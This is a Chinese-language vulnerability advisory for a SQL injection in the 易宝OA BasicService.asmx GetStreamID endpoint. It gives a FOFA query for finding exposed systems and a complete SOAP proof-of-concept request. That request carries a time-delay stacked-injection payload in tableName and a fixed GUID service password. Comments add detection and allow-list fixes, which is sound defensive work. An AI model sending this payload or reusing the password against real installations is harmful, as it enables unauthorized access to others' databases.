
易宝OA-BasicService.asmx存在SQL注入漏洞

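易宝OA-BasicService.asmx存在SQL注入漏洞

易宝OA 的 `/WebService/BasicService.asmx` 接口 `GetStreamID` 方法中，`tableName` 参数疑似未经过滤即拼接进 SQL 语句，下方请求通过延时语句验证该注入点。排查时可检索 Web 日志中针对该接口、`tableName` 含单引号或分号的 POST 请求；修复方向是对 `tableName` 做服务端白名单校验，并限制该 WebService 的访问来源。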

fofa

title="欢迎登录易宝OA系统"

poc

POST /WebService/BasicService.asmx HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Content-Type: application/x-www-form-urlencoded
SOAPAction: "http://tempuri.org/GetStreamID"
Content-Length: 85

<?xml version="1.0" encoding="utf-8"?>
<!-- SOAP request body for the GetStreamID operation of BasicService.asmx.
     Annotated for review: the two child elements below are the
     caller-controlled inputs this request exercises. -->
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<GetStreamID xmlns="http://tempuri.org/">
<!-- tableName is the tested parameter. The value closes a string literal,
     stacks a WAITFOR DELAY of 6 seconds and ends with a SQL comment marker,
     so a response delayed by about 6 seconds would indicate the value is
     concatenated into a SQL Server statement unescaped (inferred from the
     payload; the server code is not shown here).
     Detection: flag POSTs to /WebService/BasicService.asmx with SOAPAction
     GetStreamID whose tableName contains a quote or semicolon.
     Mitigation: identifiers cannot be bound as SQL parameters, so the server
     should accept tableName only from an allow-list of known table names. -->
<tableName>';waitfor delay '0:0:6'--+</tableName>
<!-- webservicePassword is sent as a fixed GUID literal. NOTE(review):
     presumably a shared or default service secret; confirm against the
     vendor documentation and rotate it if it is the same on every install. -->
<webservicePassword>{ac80457b-368d-4062-b2dd-ae4d490e1c4b}</webservicePassword>
</GetStreamID>
</soap:Body>
</soap:Envelope>